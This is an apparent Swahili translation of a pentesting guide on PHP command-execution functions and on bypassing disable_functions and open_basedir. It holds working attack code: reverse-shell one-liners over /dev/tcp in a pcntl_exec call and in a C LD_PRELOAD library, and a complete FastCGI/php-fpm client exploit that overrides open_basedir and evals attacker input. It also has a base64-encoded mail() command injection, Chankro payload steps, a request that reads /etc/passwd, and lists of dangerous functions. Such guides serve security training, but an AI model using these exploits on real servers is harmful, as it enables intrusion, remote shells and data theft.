PHP - Kazi za Kusaidia & disable_functions/open_basedir bypass

Reading time: 19 minutes

PHP Amri & Utekelezaji wa Kanuni

Utekelezaji wa Amri za PHP

Kumbuka: A p0wny-shell php webshell inaweza kiotomatiki kuangalia na kupita kazi zifuatazo ikiwa baadhi yao zimezuiliwa.

exec - Inarudisha mstari wa mwisho wa matokeo ya amri

echo exec("uname  -a");

passthru - Inapitisha matokeo ya amri moja kwa moja kwa kivinjari

echo passthru("uname -a");

system - Inapitisha matokeo ya amri moja kwa moja kwa kivinjari na inarudisha mstari wa mwisho

echo system("uname -a");

shell_exec - Inarudisha matokeo ya amri

echo shell_exec("uname -a");

`` (backticks) - Sawasawa na shell_exec()

echo `uname -a`

popen - Inafungua bomba la kusoma au kuandika kwa mchakato wa amri

echo fread(popen("/bin/ls /", "r"), 4096);

proc_open - Inafanana na popen() lakini ina kiwango kikubwa zaidi cha udhibiti

proc_close(proc_open("uname -a",array(),$something));

preg_replace

<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

pcntl_exec - Inatekeleza programu (kwa kawaida katika PHP za kisasa na zisizo za kisasa unahitaji kupakia moduli ya pcntl.so ili kutumia kazi hii)

pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]);

mail / mb_send_mail - Kazi hii inatumika kutuma barua pepe, lakini inaweza pia kutumika vibaya kuingiza amri zisizo za kawaida ndani ya parameter ya $options. Hii ni kwa sababu php mail function kawaida inaita sendmail binary ndani ya mfumo na inaruhusu kuweka chaguzi za ziada. Hata hivyo, huwezi kuona matokeo ya amri iliyotekelezwa, hivyo inashauriwa kuunda script ya shell inayandika matokeo kwenye faili, kuitekeleza kwa kutumia barua pepe, na kuchapisha matokeo:

file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777);  mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt');

dl - Kazi hii inaweza kutumika kupakia upanuzi wa PHP kwa njia ya kidinamik. Kazi hii haitakuwepo kila wakati, hivyo unapaswa kuangalia kama inapatikana kabla ya kujaribu kuifanyia shambulio. Soma ukurasa huu kujifunza jinsi ya kutumia kazi hii.

PHP Code Execution

Mbali na eval, kuna njia nyingine za kutekeleza msimbo wa PHP: include/require zinaweza kutumika kwa utekelezaji wa msimbo wa mbali katika mfumo wa Local File Include na Remote File Include vulnerabilities.

${<php code>}              // If your input gets reflected in any PHP string, it will be executed.
eval()
assert()                   //  identical to eval()
preg_replace('/.*/e',...)  // e does an eval() on the match
create_function()          // Create a function and use eval()
include()
include_once()
require()
require_once()
$_GET['func_name']($_GET['argument']);

$func = new ReflectionFunction($_GET['func_name']);
$func->invoke();
// or
$func->invokeArgs(array());

// or serialize/unserialize function

disable_functions & open_basedir

Disabled functions ni mipangilio inayoweza kuwekewa katika faili za .ini katika PHP ambayo itakataza matumizi ya functions zilizoonyeshwa. Open basedir ni mipangilio inayomwambia PHP folda ambayo inaweza kufikiwa.
Mipangilio ya PHP inapaswa kuwekwa katika njia /etc/php7/conf.d au sawa na hiyo.

Mipangilio yote inaweza kuonekana katika matokeo ya phpinfo():

open_basedir Bypass

open_basedir itapangilia folda ambazo PHP inaweza kufikia, hu wezi kuandika/soma/kutekeleza faili yoyote nje ya folda hizo, lakini pia hu wezi hata kuorodhesha saraka nyingine.
Hata hivyo, ikiwa kwa namna fulani unaweza kutekeleza msimbo wa PHP wa kawaida unaweza jaribu kipande hiki cha codes kujaribu bypass kikomo hicho.

Kuorodhesha saraka kwa glob:// bypass

Katika mfano huu wa kwanza, itifaki ya glob:// na njia fulani ya bypass inatumika:

<?php
$file_list = array();
$it = new DirectoryIterator("glob:///v??/run/*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
$it = new DirectoryIterator("glob:///v??/run/.*");
foreach($it as $f) {
$file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
echo "{$f}<br/>";
}

Note1: Katika njia unaweza pia kutumia /e??/* kuorodhesha /etc/* na folda nyingine yoyote.
Note2: Inaonekana kama sehemu ya msimbo imejirudia, lakini hiyo ni muhimu!
Note3: Mfano huu ni wa manufaa tu kuorodhesha folda si kusoma faili

Kukwepa open_basedir kwa kutumia FastCGI

Ikiwa unataka kujifunza zaidi kuhusu PHP-FPM na FastCGI unaweza kusoma sehemu ya kwanza ya ukurasa huu.
Ikiwa php-fpm imewekwa unaweza kuitumia kuweza kukwepa kabisa open_basedir:

Kumbuka kwamba jambo la kwanza unahitaji kufanya ni kutafuta ambapo unix socket ya php-fpm iko. Inatumika kuwa chini ya /var/run hivyo unaweza kutumia msimbo wa awali kuorodhesha directory na kuipata.
Msimbo kutoka hapa.

<?php
/**
* Note : Code is released under the GNU LGPL
*
* Please do not change the header of this file
*
* This library is free software; you can redistribute it and/or modify it under the terms of the GNU
* Lesser General Public License as published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* See the GNU Lesser General Public License for more details.
*/
/**
* Handles communication with a FastCGI application
*
* @author      Pierrick Charron <pierrick@webstart.fr>
* @version     1.0
*/
class FCGIClient
{
const VERSION_1            = 1;
const BEGIN_REQUEST        = 1;
const ABORT_REQUEST        = 2;
const END_REQUEST          = 3;
const PARAMS               = 4;
const STDIN                = 5;
const STDOUT               = 6;
const STDERR               = 7;
const DATA                 = 8;
const GET_VALUES           = 9;
const GET_VALUES_RESULT    = 10;
const UNKNOWN_TYPE         = 11;
const MAXTYPE              = self::UNKNOWN_TYPE;
const RESPONDER            = 1;
const AUTHORIZER           = 2;
const FILTER               = 3;
const REQUEST_COMPLETE     = 0;
const CANT_MPX_CONN        = 1;
const OVERLOADED           = 2;
const UNKNOWN_ROLE         = 3;
const MAX_CONNS            = 'MAX_CONNS';
const MAX_REQS             = 'MAX_REQS';
const MPXS_CONNS           = 'MPXS_CONNS';
const HEADER_LEN           = 8;
/**
* Socket
* @var Resource
*/
private $_sock = null;
/**
* Host
* @var String
*/
private $_host = null;
/**
* Port
* @var Integer
*/
private $_port = null;
/**
* Keep Alive
* @var Boolean
*/
private $_keepAlive = false;
/**
* Constructor
*
* @param String $host Host of the FastCGI application
* @param Integer $port Port of the FastCGI application
*/
public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
{
$this->_host = $host;
$this->_port = $port;
}
/**
* Define whether or not the FastCGI application should keep the connection
* alive at the end of a request
*
* @param Boolean $b true if the connection should stay alive, false otherwise
*/
public function setKeepAlive($b)
{
$this->_keepAlive = (boolean)$b;
if (!$this->_keepAlive && $this->_sock) {
fclose($this->_sock);
}
}
/**
* Get the keep alive status
*
* @return Boolean true if the connection should stay alive, false otherwise
*/
public function getKeepAlive()
{
return $this->_keepAlive;
}
/**
* Create a connection to the FastCGI application
*/
private function connect()
{
if (!$this->_sock) {
//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
if (!$this->_sock) {
throw new Exception('Unable to connect to FastCGI application');
}
}
}
/**
* Build a FastCGI packet
*
* @param Integer $type Type of the packet
* @param String $content Content of the packet
* @param Integer $requestId RequestId
*/
private function buildPacket($type, $content, $requestId = 1)
{
$clen = strlen($content);
return chr(self::VERSION_1)         /* version */
. chr($type)                    /* type */
. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
. chr($requestId & 0xFF)        /* requestIdB0 */
. chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
. chr($clen & 0xFF)             /* contentLengthB0 */
. chr(0)                        /* paddingLength */
. chr(0)                        /* reserved */
. $content;                     /* content */
}
/**
* Build an FastCGI Name value pair
*
* @param String $name Name
* @param String $value Value
* @return String FastCGI Name value pair
*/
private function buildNvpair($name, $value)
{
$nlen = strlen($name);
$vlen = strlen($value);
if ($nlen < 128) {
/* nameLengthB0 */
$nvpair = chr($nlen);
} else {
/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
}
if ($vlen < 128) {
/* valueLengthB0 */
$nvpair .= chr($vlen);
} else {
/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
}
/* nameData & valueData */
return $nvpair . $name . $value;
}
/**
* Read a set of FastCGI Name value pairs
*
* @param String $data Data containing the set of FastCGI NVPair
* @return array of NVPair
*/
private function readNvpair($data, $length = null)
{
$array = array();
if ($length === null) {
$length = strlen($data);
}
$p = 0;
while ($p != $length) {
$nlen = ord($data{$p++});
if ($nlen >= 128) {
$nlen = ($nlen & 0x7F << 24);
$nlen |= (ord($data{$p++}) << 16);
$nlen |= (ord($data{$p++}) << 8);
$nlen |= (ord($data{$p++}));
}
$vlen = ord($data{$p++});
if ($vlen >= 128) {
$vlen = ($nlen & 0x7F << 24);
$vlen |= (ord($data{$p++}) << 16);
$vlen |= (ord($data{$p++}) << 8);
$vlen |= (ord($data{$p++}));
}
$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
$p += ($nlen + $vlen);
}
return $array;
}
/**
* Decode a FastCGI Packet
*
* @param String $data String containing all the packet
* @return array
*/
private function decodePacketHeader($data)
{
$ret = array();
$ret['version']       = ord($data{0});
$ret['type']          = ord($data{1});
$ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
$ret['paddingLength'] = ord($data{6});
$ret['reserved']      = ord($data{7});
return $ret;
}
/**
* Read a FastCGI Packet
*
* @return array
*/
private function readPacket()
{
if ($packet = fread($this->_sock, self::HEADER_LEN)) {
$resp = $this->decodePacketHeader($packet);
$resp['content'] = '';
if ($resp['contentLength']) {
$len  = $resp['contentLength'];
while ($len && $buf=fread($this->_sock, $len)) {
$len -= strlen($buf);
$resp['content'] .= $buf;
}
}
if ($resp['paddingLength']) {
$buf=fread($this->_sock, $resp['paddingLength']);
}
return $resp;
} else {
return false;
}
}
/**
* Get Informations on the FastCGI application
*
* @param array $requestedInfo information to retrieve
* @return array
*/
public function getValues(array $requestedInfo)
{
$this->connect();
$request = '';
foreach ($requestedInfo as $info) {
$request .= $this->buildNvpair($info, '');
}
fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
$resp = $this->readPacket();
if ($resp['type'] == self::GET_VALUES_RESULT) {
return $this->readNvpair($resp['content'], $resp['length']);
} else {
throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
}
}
/**
* Execute a request to the FastCGI application
*
* @param array $params Array of parameters
* @param String $stdin Content
* @return String
*/
public function request(array $params, $stdin)
{
$response = '';
$this->connect();
$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
$paramsRequest = '';
foreach ($params as $key => $value) {
$paramsRequest .= $this->buildNvpair($key, $value);
}
if ($paramsRequest) {
$request .= $this->buildPacket(self::PARAMS, $paramsRequest);
}
$request .= $this->buildPacket(self::PARAMS, '');
if ($stdin) {
$request .= $this->buildPacket(self::STDIN, $stdin);
}
$request .= $this->buildPacket(self::STDIN, '');
fwrite($this->_sock, $request);
do {
$resp = $this->readPacket();
if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
$response .= $resp['content'];
}
} while ($resp && $resp['type'] != self::END_REQUEST);
var_dump($resp);
if (!is_array($resp)) {
throw new Exception('Bad request');
}
switch (ord($resp['content']{4})) {
case self::CANT_MPX_CONN:
throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
break;
case self::OVERLOADED:
throw new Exception('New request rejected; too busy [OVERLOADED]');
break;
case self::UNKNOWN_ROLE:
throw new Exception('Role value not known [UNKNOWN_ROLE]');
break;
case self::REQUEST_COMPLETE:
return $response;
}
}
}
?>
<?php
// real exploit start here
if (!isset($_REQUEST['cmd'])) {
die("Check your input\n");
}
if (!isset($_REQUEST['filepath'])) {
$filepath = __FILE__;
}else{
$filepath = $_REQUEST['filepath'];
}
$req = '/'.basename($filepath);
$uri = $req .'?'.'command='.$_REQUEST['cmd'];
$client = new FCGIClient("unix:///var/run/php-fpm.sock", -1);
$code = "<?php eval(\$_REQUEST['command']);?>"; // php payload -- Doesnt do anything
$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
//$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
$params = array(
'GATEWAY_INTERFACE' => 'FastCGI/1.0',
'REQUEST_METHOD'    => 'POST',
'SCRIPT_FILENAME'   => $filepath,
'SCRIPT_NAME'       => $req,
'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
'REQUEST_URI'       => $uri,
'DOCUMENT_URI'      => $req,
#'DOCUMENT_ROOT'     => '/',
'PHP_VALUE'         => $php_value,
'SERVER_SOFTWARE'   => '80sec/wofeiwo',
'REMOTE_ADDR'       => '127.0.0.1',
'REMOTE_PORT'       => '9985',
'SERVER_ADDR'       => '127.0.0.1',
'SERVER_PORT'       => '80',
'SERVER_NAME'       => 'localhost',
'SERVER_PROTOCOL'   => 'HTTP/1.1',
'CONTENT_LENGTH'    => strlen($code)
);
// print_r($_REQUEST);
// print_r($params);
//echo "Call: $uri\n\n";
echo $client->request($params, $code)."\n";
?>

Hii skripti itawasiliana na unix socket ya php-fpm (kawaida iko katika /var/run ikiwa fpm inatumika) ili kutekeleza msimbo wowote. Mipangilio ya open_basedir itabadilishwa na sifa ya PHP_VALUE inayotumwa.
Kumbuka jinsi eval inavyotumika kutekeleza msimbo wa PHP unayotuma ndani ya cmd parameter.
Pia kumbuka mstari wa 324 ulio na maoni, unaweza kuondoa maoni na payload itajihusisha moja kwa moja na URL iliyotolewa na kutekeleza msimbo wa PHP ulio ndani yake.
Fikia tu http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd'); ili kupata maudhui ya faili ya /etc/passwd.

disable_functions Bypass

Ikiwa unafanikiwa kuwa na msimbo wa PHP ukitekelezwa ndani ya mashine, huenda unataka kwenda kwenye kiwango kinachofuata na kutekeleza amri za mfumo zisizo na mipaka. Katika hali hii ni kawaida kugundua kwamba nyingi au zote za functions za PHP zinazoruhusu kutekeleza amri za mfumo zimezuiliwa katika disable_functions.
Hivyo, hebu tuone jinsi unavyoweza kupita kizuizi hiki (ikiwa unaweza)

Automatic bypass discovery

Unaweza kutumia chombo https://github.com/teambi0s/dfunc-bypasser na kitakuonyesha ni ipi function (ikiwa ipo) unaweza kutumia ili kupita disable_functions.

Bypassing using other system functions

Rudi tu mwanzo wa ukurasa huu na angalia ikiwa yoyote ya functions zinazotekeleza amri haijazuiliwa na inapatikana katika mazingira. Ikiwa unapata moja tu kati yao, utaweza kuitumia kutekeleza amri za mfumo zisizo na mipaka.

LD_PRELOAD bypass

Inajulikana kwamba baadhi ya functions katika PHP kama mail() zitafanya kutekeleza binaries ndani ya mfumo. Kwa hivyo, unaweza kuzitumia vibaya kwa kutumia variable ya mazingira LD_PRELOAD ili kufanya zipakue maktaba yoyote inayoweza kutekeleza chochote.

Functions that can be used to bypass disable_functions with LD_PRELOAD

• mail
• mb_send_mail: Inafanya kazi wakati moduli ya php-mbstring imewekwa.
• imap_mail: Inafanya kazi ikiwa moduli ya php-imap ipo.
• libvirt_connect: Inahitaji moduli ya php-libvirt-php.
• gnupg_init: Inaweza kutumika ikiwa moduli ya php-gnupg imewekwa.
• new imagick(): Darasa hili linaweza kutumika vibaya ili kupita vizuizi. Mbinu za kina za unyakuzi zinaweza kupatikana katika andiko hapa.

Unaweza kupata hapa skripti ya fuzzing iliyotumika kupata hizo functions.

Hapa kuna maktaba unaweza kuunda ili kutumia variable ya mazingira ya LD_PRELOAD:

#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>

uid_t getuid(void){
unsetenv("LD_PRELOAD");
system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
return 1;
}

Bypass using Chankro

Ili kutumia vibaya usanidi huu mbaya unaweza Chankro. Hii ni zana ambayo itaunda PHP exploit ambayo unahitaji kupakia kwenye seva iliyo hatarini na kuitekeleza (fikia kupitia wavuti).
Chankro itaandika ndani ya diski za waathirika maktaba na reverse shell unayotaka kutekeleza na itatumia LD_PRELOAD trick + PHP mail() kazi ili kutekeleza reverse shell.

Kumbuka kwamba ili kutumia Chankro, mail na putenv haziwezi kuonekana ndani ya orodha ya disable_functions.
Katika mfano ufuatao unaweza kuona jinsi ya kuunda chankro exploit kwa arch 64, ambayo itatekeleza whoami na kuokoa matokeo katika /tmp/chankro_shell.out, chankro it andika maktaba na payload katika /tmp na exploit ya mwisho itaitwa bicho.php (hiyo ndiyo faili unahitaji kupakia kwenye seva za waathirika):

#!/bin/sh
whoami > /tmp/chankro_shell.out

python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php

Ikiwa unapata kwamba mail kazi imezuiwa na kazi zilizozuiliwa, unaweza bado kuwa na uwezo wa kutumia kazi mb_send_mail.
Taarifa zaidi kuhusu mbinu hii na Chankro hapa: https://www.tarlogic.com/en/blog/how-to-bypass-disable_functions-and-open_basedir/

"Bypass" kwa kutumia uwezo wa PHP

Kumbuka kwamba kwa kutumia PHP unaweza kusoma na kuandika faili, kuunda saraka na kubadilisha ruhusa.
Unaweza hata kudump databases.
Labda kwa kutumia PHP ili kuorodhesha sanduku unaweza kupata njia ya kupandisha mamlaka/kutekeleza amri (kwa mfano kusoma funguo za ssh za kibinafsi).

Nimeunda webshell ambayo inafanya iwe rahisi sana kutekeleza vitendo hivi (kumbuka kwamba webshell nyingi zitakupa chaguzi hizi pia): https://github.com/carlospolop/phpwebshelllimited

Bypass zinazotegemea Moduli/Toleo

Kuna njia kadhaa za kupita disable_functions ikiwa moduli maalum inatumika au kutumia toleo maalum la PHP:

• FastCGI/PHP-FPM (FastCGI Process Manager)
• Bypass na FFI - Foreign Function Interface iliyoanzishwa
• Bypass kupitia mem
• mod_cgi
• PHP Perl Extension Safe_mode
• dl function
• Huu exploit
• 5.* - inayoweza kutumika kwa mabadiliko madogo kwenye PoC
• 7.0 - matoleo yote hadi sasa
• 7.1 - matoleo yote hadi sasa
• 7.2 - matoleo yote hadi sasa
• 7.3 - matoleo yote hadi sasa
• 7.4 - matoleo yote hadi sasa
• 8.0 - matoleo yote hadi sasa
• Kutoka 7.0 hadi 8.0 exploit (Unix pekee)
• PHP 7.0=7.4 (*nix)
• Imagick 3.3.0 PHP >= 5.4
• PHP 5.x Shellsock
• PHP 5.2.4 ionCube
• PHP <= 5.2.9 Windows
• PHP 5.2.4/5.2.5 cURL
• PHP 5.2.3 -Win32std
• PHP 5.2 FOpen exploit
• PHP 4 >= 4.2.-, PHP 5 pcntl_exec

Zana ya Kiotomatiki

Script ifuatayo inajaribu baadhi ya mbinu zilizozungumziwa hapa:
https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/shell.php

Funguo nyingine za PHP za Kuvutia

Orodha ya kazi zinazokubali callbacks

Kazi hizi zinakubali parameter ya string ambayo inaweza kutumika kuita kazi ya uchaguzi wa mshambuliaji. Kulingana na kazi, mshambuliaji anaweza kuwa na uwezo wa kupitisha parameter au la. Katika hali hiyo, kazi ya Ufichuzi wa Taarifa kama phpinfo() inaweza kutumika.

Callbacks / Callables

Orodha inayofuata kutoka hapa

// Function => Position of callback arguments
'ob_start' => 0,
'array_diff_uassoc' => -1,
'array_diff_ukey' => -1,
'array_filter' => 1,
'array_intersect_uassoc' => -1,
'array_intersect_ukey' => -1,
'array_map' => 0,
'array_reduce' => 1,
'array_udiff_assoc' => -1,
'array_udiff_uassoc' => array(-1, -2),
'array_udiff' => -1,
'array_uintersect_assoc' => -1,
'array_uintersect_uassoc' => array(-1, -2),
'array_uintersect' => -1,
'array_walk_recursive' => 1,
'array_walk' => 1,
'assert_options' => 1,
'uasort' => 1,
'uksort' => 1,
'usort' => 1,
'preg_replace_callback' => 1,
'spl_autoload_register' => 0,
'iterator_apply' => 1,
'call_user_func' => 0,
'call_user_func_array' => 0,
'register_shutdown_function' => 0,
'register_tick_function' => 0,
'set_error_handler' => 0,
'set_exception_handler' => 0,
'session_set_save_handler' => array(0, 1, 2, 3, 4, 5),
'sqlite_create_aggregate' => array(2, 3),
'sqlite_create_function' => 2,

Ufunuo wa Taarifa

Mara nyingi, kito hiki cha kazi si vyanzo. Lakini inaweza kuwa udhaifu ikiwa data yoyote iliyorejeshwa inaonekana kwa mshambuliaji. Ikiwa mshambuliaji anaweza kuona phpinfo(), ni udhaifu bila shaka.

phpinfo
posix_mkfifo
posix_getlogin
posix_ttyname
getenv
get_current_user
proc_get_status
get_cfg_var
disk_free_space
disk_total_space
diskfreespace
getcwd
getlastmo
getmygid
getmyinode
getmypid
getmyuid

Mengineyo

extract    // Opens the door for register_globals attacks (see study in scarlet).
parse_str  // works like extract if only one argument is given.
putenv
ini_set
mail       // has CRLF injection in the 3rd parameter, opens the door for spam.
header     // on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area.
proc_nice
proc_terminate
proc_close
pfsockopen
fsockopen
apache_child_terminate
posix_kill
posix_mkfifo
posix_setpgid
posix_setsid
posix_setuid

Filesystem Functions

Kulingana na RATS, kazi zote za filesystem katika php ni mbaya. Baadhi ya hizi hazionekani kuwa na manufaa sana kwa mshambuliaji. Nyingine ni za manufaa zaidi kuliko unavyoweza kufikiria. Kwa mfano, ikiwa allow_url_fopen=On, basi url inaweza kutumika kama njia ya faili, hivyo wito wa copy($_GET['s'], $_GET['d']); unaweza kutumika kupakia script ya PHP mahali popote kwenye mfumo. Pia, ikiwa tovuti ina udhaifu wa ombi lililotumwa kupitia GET, kila moja ya hizo kazi za filesystem inaweza kutumika vibaya kupeleka shambulio kwa mwenyeji mwingine kupitia seva yako.

Open filesystem handler

fopen
tmpfile
bzopen
gzopen
SplFileObject->__construct

Andika kwenye mfumo wa faili (kwa sehemu kwa pamoja na kusoma)

chgrp
chmod
chown
copy
file_put_contents
lchgrp
lchown
link
mkdir
move_uploaded_file
rename
rmdir
symlink
tempnam
touch
unlink
imagepng     // 2nd parameter is a path.
imagewbmp    // 2nd parameter is a path.
image2wbmp   // 2nd parameter is a path.
imagejpeg    // 2nd parameter is a path.
imagexbm     // 2nd parameter is a path.
imagegif     // 2nd parameter is a path.
imagegd      // 2nd parameter is a path.
imagegd2     // 2nd parameter is a path.
iptcembed
ftp_get
ftp_nb_get
scandir

Soma kutoka kwa mfumo wa faili

file_exists
-- file_get_contents
file
fileatime
filectime
filegroup
fileinode
filemtime
fileowner
fileperms
filesize
filetype
glob
is_dir
is_executable
is_file
is_link
is_readable
is_uploaded_file
is_writable
is_writeable
linkinfo
lstat
parse_ini_file
pathinfo
readfile
readlink
realpath
stat
gzfile
readgzfile
getimagesize
imagecreatefromgif
imagecreatefromjpeg
imagecreatefrompng
imagecreatefromwbmp
imagecreatefromxbm
imagecreatefromxpm
ftp_put
ftp_nb_put
exif_read_data
read_exif_data
exif_thumbnail
exif_imagetype
hash_file
hash_hmac_file
hash_update_file
md5_file
sha1_file
-- highlight_file
-- show_source
php_strip_whitespace
get_meta_tags